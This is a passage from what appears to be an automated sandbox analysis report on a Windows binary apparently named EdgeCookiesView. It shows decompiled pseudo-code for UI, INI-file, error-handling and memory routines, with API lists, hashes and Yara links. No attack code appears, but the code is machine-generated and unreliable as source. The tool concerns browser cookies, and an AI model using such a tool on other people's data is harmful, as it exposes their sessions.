						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
						_t38 =  *((intOrPtr*)(__edi + 0x6c));
						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
						_t44 =  &_v516;
						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x6c)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x70)));
						L0040DFD6();
						_t46 = _t46 + 0x24;
						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
				}
				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
			}











                                                                                                                                                      0x00408e65
                                                                                                                                                      0x00408e65
                                                                                                                                                      0x00408e79
                                                                                                                                                      0x00408e7e
                                                                                                                                                      0x00408e83
                                                                                                                                                      0x00408e86
                                                                                                                                                      0x00408e86
                                                                                                                                                      0x00408e9c
                                                                                                                                                      0x00408eb3
                                                                                                                                                      0x00408eb5
                                                                                                                                                      0x00408eb8
                                                                                                                                                      0x00408ec7
                                                                                                                                                      0x00408ecd
                                                                                                                                                      0x00408ed2
                                                                                                                                                      0x00408ed4
                                                                                                                                                      0x00408ed5
                                                                                                                                                      0x00408ed8
                                                                                                                                                      0x00408ed9
                                                                                                                                                      0x00408ede
                                                                                                                                                      0x00408ee3
                                                                                                                                                      0x00408ee6
                                                                                                                                                      0x00408eeb
                                                                                                                                                      0x00408ef6
                                                                                                                                                      0x00408efb
                                                                                                                                                      0x00408efc
                                                                                                                                                      0x00408f01
                                                                                                                                                      0x00408f13

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00408E9C
                                                                                                                                                        • Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57
                                                                                                                                                        • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                        • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                      • _snwprintf.MSVCRT ref: 00408EE6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                      • Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                      • Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
                                                                                                                                                      • Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                      • Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040BA94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BA94(void* __esi) {
				struct _WNDCLASSW _v44;
				struct HINSTANCE__* _t20;
				struct HWND__* _t23;

				_v44.style = 0;
				_v44.lpfnWndProc = E00401896;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hInstance = GetModuleHandleW(0);
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
				_v44.lpszClassName = __esi + 4;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassW( &_v44);
				_t20 = GetModuleHandleW(0);
				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
				 *(__esi + 0x208) = _t23;
				return _t23;
			}






                                                                                                                                                      0x0040baa5
                                                                                                                                                      0x0040baa8
                                                                                                                                                      0x0040baaf
                                                                                                                                                      0x0040bab2
                                                                                                                                                      0x0040bab7
                                                                                                                                                      0x0040bac0
                                                                                                                                                      0x0040bac6
                                                                                                                                                      0x0040bacd
                                                                                                                                                      0x0040bad0
                                                                                                                                                      0x0040bad7
                                                                                                                                                      0x0040bada
                                                                                                                                                      0x0040bae1
                                                                                                                                                      0x0040bb05
                                                                                                                                                      0x0040bb0c
                                                                                                                                                      0x0040bb14

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,74784E00,00000000), ref: 0040BAB5
                                                                                                                                                      • RegisterClassW.USER32 ref: 0040BADA
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
                                                                                                                                                      • CreateWindowExW.USER32 ref: 0040BB05
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                      • String ID: EdgeCookiesView
                                                                                                                                                      • API String ID: 2678498856-2656830938
                                                                                                                                                      • Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                      • Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
                                                                                                                                                      • Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                      • Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406DE5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
				void _v8198;
				short _v8200;
				void* _t18;

				E0040E340(0x2004, _t18);
				_v8200 = _v8200 & 0x00000000;
				memset( &_v8198, 0, 0x2000);
				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
				if(_v8200 == 0 || _a12 != 0) {
					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
				} else {
					return 0;
				}
			}






                                                                                                                                                      0x00406ded
                                                                                                                                                      0x00406df2
                                                                                                                                                      0x00406e0a
                                                                                                                                                      0x00406e32
                                                                                                                                                      0x00406e40
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406e48
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406e48

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00406E0A
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00406E32
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString$Writememset
                                                                                                                                                      • String ID: 8,A$H.A
                                                                                                                                                      • API String ID: 747731527-1209539780
                                                                                                                                                      • Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                      • Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
                                                                                                                                                      • Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                      • Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004053B1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040E340(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E004052B3(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040DFD6();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                                                      0x004053b1
                                                                                                                                                      0x004053b9
                                                                                                                                                      0x004053bf
                                                                                                                                                      0x004053c3
                                                                                                                                                      0x004053cb
                                                                                                                                                      0x004053cb
                                                                                                                                                      0x004053d4
                                                                                                                                                      0x004053df
                                                                                                                                                      0x004053e0
                                                                                                                                                      0x004053e1
                                                                                                                                                      0x004053ec
                                                                                                                                                      0x004053f1
                                                                                                                                                      0x004053f2
                                                                                                                                                      0x00405413

                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004053C5
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                      • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                      • Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                      • Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
                                                                                                                                                      • Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                      • Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DB6F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E0040DB6F(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryW(L"shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                                                                                      0x0040db76
                                                                                                                                                      0x0040db7e
                                                                                                                                                      0x0040db86
                                                                                                                                                      0x0040db8e
                                                                                                                                                      0x0040db9b
                                                                                                                                                      0x0040db9b
                                                                                                                                                      0x0040db9e
                                                                                                                                                      0x0040dba8

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                      • API String ID: 145871493-1506664499
                                                                                                                                                      • Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                      • Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
                                                                                                                                                      • Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                      • Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406B34, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t31;
				struct HWND__* _t33;

				_t31 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t33 = GetParent(_t31);
					GetWindowRect(_t31,  &_v20);
					GetClientRect(_t33,  &_v36);
					MapWindowPoints(0, _t33,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00405D0F(_t31, 0x400000);
				}
				return 1;
			}









                                                                                                                                                      0x00406b3f
                                                                                                                                                      0x00406b42
                                                                                                                                                      0x00406b4c
                                                                                                                                                      0x00406b53
                                                                                                                                                      0x00406b5e
                                                                                                                                                      0x00406b6e
                                                                                                                                                      0x00406b7c
                                                                                                                                                      0x00406b84
                                                                                                                                                      0x00406b8a
                                                                                                                                                      0x00406b90
                                                                                                                                                      0x00406b95
                                                                                                                                                      0x00406b9d
                                                                                                                                                      0x00406ba3
                                                                                                                                                      0x00406ba9

                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32(?), ref: 00406B46
                                                                                                                                                      • GetWindowRect.USER32 ref: 00406B53
                                                                                                                                                      • GetClientRect.USER32 ref: 00406B5E
                                                                                                                                                      • MapWindowPoints.USER32 ref: 00406B6E
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                      • Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                      • Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
                                                                                                                                                      • Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                      • Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00409F23, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E00409F23(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040E038();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040E032();
				return _t20;
			}











                                                                                                                                                      0x00409f23
                                                                                                                                                      0x00409f29
                                                                                                                                                      0x00409f30
                                                                                                                                                      0x00409f31
                                                                                                                                                      0x00409f32
                                                                                                                                                      0x00409f3a
                                                                                                                                                      0x00409f3d
                                                                                                                                                      0x00409f3f
                                                                                                                                                      0x00409f48
                                                                                                                                                      0x00409f4b
                                                                                                                                                      0x00409f4e
                                                                                                                                                      0x00409f50
                                                                                                                                                      0x00409f53
                                                                                                                                                      0x00409f5a
                                                                                                                                                      0x00409f64
                                                                                                                                                      0x00409f6e
                                                                                                                                                      0x00409f73
                                                                                                                                                      0x00409f76
                                                                                                                                                      0x00409f79
                                                                                                                                                      0x00409f7c
                                                                                                                                                      0x00409f7f
                                                                                                                                                      0x00409f80
                                                                                                                                                      0x00409f85
                                                                                                                                                      0x00409f86
                                                                                                                                                      0x00409f89
                                                                                                                                                      0x00409f91

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$??2@??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1252195045-0
                                                                                                                                                      • Opcode ID: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
                                                                                                                                                      • Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
                                                                                                                                                      • Opcode Fuzzy Hash: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
                                                                                                                                                      • Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040768E, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E0040768E(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x38));
				if(_t9 != 0) {
					_push(_t9);
					L0040E032();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x48));
				if(_t10 != 0) {
					_push(_t10);
					L0040E032();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
				if(_t11 != 0) {
					_push(_t11);
					L0040E032();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040E032();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040E032();
				}
				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
				 *((intOrPtr*)(_t19 + 0x38)) = 0;
				 *((intOrPtr*)(_t19 + 0x48)) = 0;
				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
				return _t11;
			}








                                                                                                                                                      0x0040768e
                                                                                                                                                      0x0040768e
                                                                                                                                                      0x00407697
                                                                                                                                                      0x00407699
                                                                                                                                                      0x0040769a
                                                                                                                                                      0x0040769f
                                                                                                                                                      0x004076a0
                                                                                                                                                      0x004076a5
                                                                                                                                                      0x004076a7
                                                                                                                                                      0x004076a8
                                                                                                                                                      0x004076ad
                                                                                                                                                      0x004076ae
                                                                                                                                                      0x004076b6
                                                                                                                                                      0x004076b8
                                                                                                                                                      0x004076b9
                                                                                                                                                      0x004076be
                                                                                                                                                      0x004076bf
                                                                                                                                                      0x004076c7
                                                                                                                                                      0x004076c9
                                                                                                                                                      0x004076cd
                                                                                                                                                      0x004076cf
                                                                                                                                                      0x004076d0
                                                                                                                                                      0x004076d6
                                                                                                                                                      0x004076d6
                                                                                                                                                      0x004076d8
                                                                                                                                                      0x004076d9
                                                                                                                                                      0x004076de
                                                                                                                                                      0x004076e0
                                                                                                                                                      0x004076e6
                                                                                                                                                      0x004076e9
                                                                                                                                                      0x004076ec
                                                                                                                                                      0x004076f3

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
                                                                                                                                                      • Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
                                                                                                                                                      • Opcode Fuzzy Hash: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
                                                                                                                                                      • Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403054, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				intOrPtr _t15;
				struct HDWP__* _t31;
				intOrPtr _t34;
				RECT* _t36;

				_push(__ecx);
				_t34 = __ecx;
				_v8 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t15 = _a12;
							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
						}
					} else {
						E00401810(__ecx + 0x40);
					}
				} else {
					_t31 = BeginDeferWindowPos(3);
					_t36 = _t34 + 0x40;
					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
					E004017E9(_t36, _t31, 1, 1, 1, 0);
					E004017E9(_t36, _t31, 2, 1, 1, 0);
					EndDeferWindowPos(_t31);
					InvalidateRect( *(_t36 + 0x10), _t36, 1);
					_t34 = _v8;
				}
				return E004015CE(_t34, _a4, _a8, _a12);
			}










                                                                                                                                                      0x00403057
                                                                                                                                                      0x0040305e
                                                                                                                                                      0x00403060
                                                                                                                                                      0x00403063
                                                                                                                                                      0x004030b9
                                                                                                                                                      0x004030c9
                                                                                                                                                      0x004030cb
                                                                                                                                                      0x004030ce
                                                                                                                                                      0x004030d5
                                                                                                                                                      0x004030d5
                                                                                                                                                      0x004030bb
                                                                                                                                                      0x004030be
                                                                                                                                                      0x004030be
                                                                                                                                                      0x00403065
                                                                                                                                                      0x00403076
                                                                                                                                                      0x0040307d
                                                                                                                                                      0x00403081
                                                                                                                                                      0x0040308c
                                                                                                                                                      0x00403098
                                                                                                                                                      0x0040309e
                                                                                                                                                      0x004030a9
                                                                                                                                                      0x004030af
                                                                                                                                                      0x004030b2
                                                                                                                                                      0x004030ef

                                                                                                                                                      APIs
                                                                                                                                                      • BeginDeferWindowPos.USER32 ref: 00403068
                                                                                                                                                        • Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2
                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040309E
                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004030A9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeferWindow$BeginInvalidateItemRect
                                                                                                                                                      • String ID: $
                                                                                                                                                      • API String ID: 4234876885-3993045852
                                                                                                                                                      • Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                      • Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
                                                                                                                                                      • Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                      • Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00409457, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
